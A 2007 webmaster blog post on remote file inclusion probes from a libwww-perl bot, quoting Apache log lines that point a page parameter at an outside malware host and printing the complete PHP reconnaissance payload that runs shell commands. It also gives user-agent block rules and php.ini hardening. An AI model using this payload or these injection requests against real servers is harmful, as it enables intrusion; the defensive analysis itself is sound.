libwww-perl/5.805 User agent (bot) visited my website


Posted on: 22 Nov 2007
Author: admin
Section: Website Development | Website Security

A weird User-Agent turned up while I was going through my Apache website logs: libwww-perl/5.805.

 



One day, while monitoring my Apache access logs, I started to see many lines like the ones below. The exact log output (including the requesting IP address, the URL requested, and the User-Agent) was:

[root@server apache/]# grep perl accesslog
71.172.97.52 - - [22/Nov/2007:20:03:10 +0200] "GET /index.php?page=http://malware.t35.com/safe.txt? HTTP/1.1" 200 22877 "-" "libwww-perl/5.805"
71.172.97.52 - - [22/Nov/2007:20:03:11 +0200] "GET /index.php?page=http://malware.t35.com/safe.txt? HTTP/1.1" 200 43780 "-" "libwww-perl/5.805"
71.172.97.52 - - [22/Nov/2007:20:03:12 +0200] "GET /Server_Operating_Systems/index.php?page=http://malware.t35.com/safe.txt? HTTP/1.1" 200 34275 "-" "libwww-perl/5.805"
71.172.97.52 - - [22/Nov/2007:20:03:13 +0200] "GET /register/index.php?page=http://malware.t35.com/safe.txt? HTTP/1.1" 200 16685 "-" "libwww-perl/5.805"

So the user at IP address 71.172.97.52 hoped that requesting this URL would make my server download the http://malware.t35.com/safe.txt? script and execute it. This is a classic remote file inclusion (RFI) probe: if index.php blindly passes the page parameter to include(), the attacker's PHP code runs on the server.
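To see how widespread such probes are, the access log can be summarized with standard shell tools. A minimal sketch (the two-line sample log is hard-coded here for illustration; point grep at your real access log instead, whose name and path depend on your Apache configuration):

```shell
#!/bin/sh
# Write a small sample in the combined log format shown above, so the
# sketch is self-contained; replace /tmp/access_sample.log with your log.
cat > /tmp/access_sample.log <<'EOF'
71.172.97.52 - - [22/Nov/2007:20:03:10 +0200] "GET /index.php?page=http://malware.t35.com/safe.txt? HTTP/1.1" 200 22877 "-" "libwww-perl/5.805"
10.0.0.9 - - [22/Nov/2007:20:05:00 +0200] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
EOF

# grep picks the libwww-perl lines; awk takes the client IP (field 1);
# sort | uniq -c counts requests per offending IP, busiest first.
grep 'libwww-perl' /tmp/access_sample.log | awk '{print $1}' | sort | uniq -c | sort -rn
```

On the sample above this prints a single line with count 1 for 71.172.97.52; on a real log it gives a quick ranking of which IPs to investigate or firewall.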

I took a look at the script that this libwww-perl bot was trying to make my server include. It is a typical reconnaissance payload: it prints OS and disk information, then runs the id command through whatever execution function PHP has left enabled. Here it is:

<?php
// Note: the quoted strings below originally contained "\n" escapes that the
// blog engine rendered as literal line breaks; they are restored here.
$dir = @getcwd();
$ker = @php_uname();
echo "enemy";
$OS = @PHP_OS;
echo "\nOSTYPE:$OS\n";
echo "\nKernel:$ker\n";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."\n";
$cmd = "id";
$eseguicmd = ex($cmd);
echo $eseguicmd;

// Run a shell command through whichever execution facility is not disabled.
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}

// Format a byte count as B/KB/MB/GB.
function view_size($size)
{
    if (!is_numeric($size)) {return FALSE;}
    if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
    elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
    elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
    else {$size = $size . " B";}
    return $size;
}
?>


A little searching on Google shows that libwww-perl (LWP) is a well-known Perl library for writing WWW clients; it also provides lwp-request, a simple command-line user agent. A request carrying this User-Agent could therefore be just about anything: a home-made bot, a custom browser, or somebody running a script. It is a very generic tool, but judging by these requests, this was definitely somebody running an attack script.

Such requests can be blocked with Apache's mod_setenvif module by adding the following lines to your .htaccess or httpd.conf file:

SetEnvIfNoCase User-Agent libwww-perl bad_bots
Order Deny,Allow
Deny from env=bad_bots

or

SetEnvIfNoCase User-Agent "libwww-perl" bad_bot=1
SetEnvIfNoCase User-Agent "psycheclone" bad_bot=1
#
# Allow universal access to robots.txt and custom 403 error page
SetEnvIf Request_URI "robots.txt$" allow_all=1
#
Order Deny,Allow
Allow from env=allow_all
Deny from env=bad_bot
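To sanity-check which User-Agent strings the rules above would catch, here is a small shell simulation: SetEnvIfNoCase performs a case-insensitive regex match against the header value, which grep -Ei reproduces. The User-Agent strings in the list are made-up examples:

```shell
#!/bin/sh
# Simulate the case-insensitive User-Agent matching done by SetEnvIfNoCase:
# any UA containing libwww-perl or psycheclone (in any case) gets flagged.
for ua in \
    "libwww-perl/5.805" \
    "LibWWW-Perl/6.02" \
    "Mozilla/5.0 (X11; FreeBSD amd64)" \
    "psycheclone"
do
    if printf '%s\n' "$ua" | grep -Eiq 'libwww-perl|psycheclone'; then
        echo "BLOCK $ua"    # would get bad_bot=1 and a 403
    else
        echo "ALLOW $ua"
    fi
done
```

Of the four samples, only the Mozilla string is allowed; note that the mixed-case LibWWW-Perl/6.02 is still blocked, which is exactly why the NoCase variant of SetEnvIf is the right choice here.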

The lines above set the environment variable bad_bot to 1 for every visitor whose User-Agent contains libwww-perl or psycheclone (and block them), and set allow_all to 1 for every request for the robots.txt file (and let those through). They should be added to the .htaccess file in your website's DocumentRoot, to httpd.conf, or to a separate bad_bots.conf (which must then be included in httpd.conf with an Include /path/to/bad_bots_file.conf line).

Besides this, you have to make sure that the following two directives are set to Off in php.ini (/usr/local/etc/php.ini under FreeBSD, or /usr/local/apache/php/php.ini under Linux):

register_globals = Off
allow_url_fopen = Off

The first line disables Register Globals; the PHP manual explains the risk:

When on, register_globals will inject your scripts with all
sorts of variables, like request variables from HTML forms. This
coupled with the fact that PHP doesn't require variable initialization
means writing insecure code is that much easier. It was a difficult
decision, but the PHP community decided to disable this directive by
default. When on, people use variables yet really don't know for sure
where they come from and can only assume.

and the second line disables opening/including files from remote URLs:

If enabled, allow_url_fopen allows PHP's file functions -- such as file_get_contents()
and the include and require statements -- to retrieve data from remote locations,
like an FTP or web site. Programmers frequently forget this and don't do proper input
filtering when passing user-provided data to these functions, opening them up to code
injection vulnerabilities. A large number of the code injection vulnerabilities reported in
PHP-based web applications are caused by the combination of enabling allow_url_fopen
and bad input filtering.
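A quick way to verify both directives is to grep the configuration file. A self-contained sketch (a throwaway sample php.ini is written first so the check runs anywhere; substitute the path to your real php.ini):

```shell
#!/bin/sh
# Check that register_globals and allow_url_fopen are Off in a php.ini.
# The sample file below stands in for the real one (e.g.
# /usr/local/etc/php.ini on FreeBSD).
cat > /tmp/php_sample.ini <<'EOF'
register_globals = Off
allow_url_fopen = Off
EOF

for directive in register_globals allow_url_fopen; do
    # Match "directive = Off" with optional whitespace, case-insensitively.
    if grep -Eiq "^[[:space:]]*${directive}[[:space:]]*=[[:space:]]*Off" /tmp/php_sample.ini; then
        echo "$directive: Off (good)"
    else
        echo "$directive: NOT Off - fix it" >&2
    fi
done
```

On a box with the PHP CLI installed, the effective runtime values can also be checked with php -i piped through the same grep, which catches the case where Apache reads a different php.ini than the one you edited.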


Useful links:
http://www.webmasterworld.com/analytics/3508143.htm
http://www.webmasterworld.com/apache/3448091.htm
http://httpd.apache.org/docs/1.3/mod/mod_setenvif.html
http://cz2.php.net/register_globals
http://phpsec.org/projects/phpsecinfo/tests/allow_url_fopen.html

Designed and developed by Andrei Manescu. Optimized for Mozilla Firefox.  
Copyright 2007 Andrei Manescu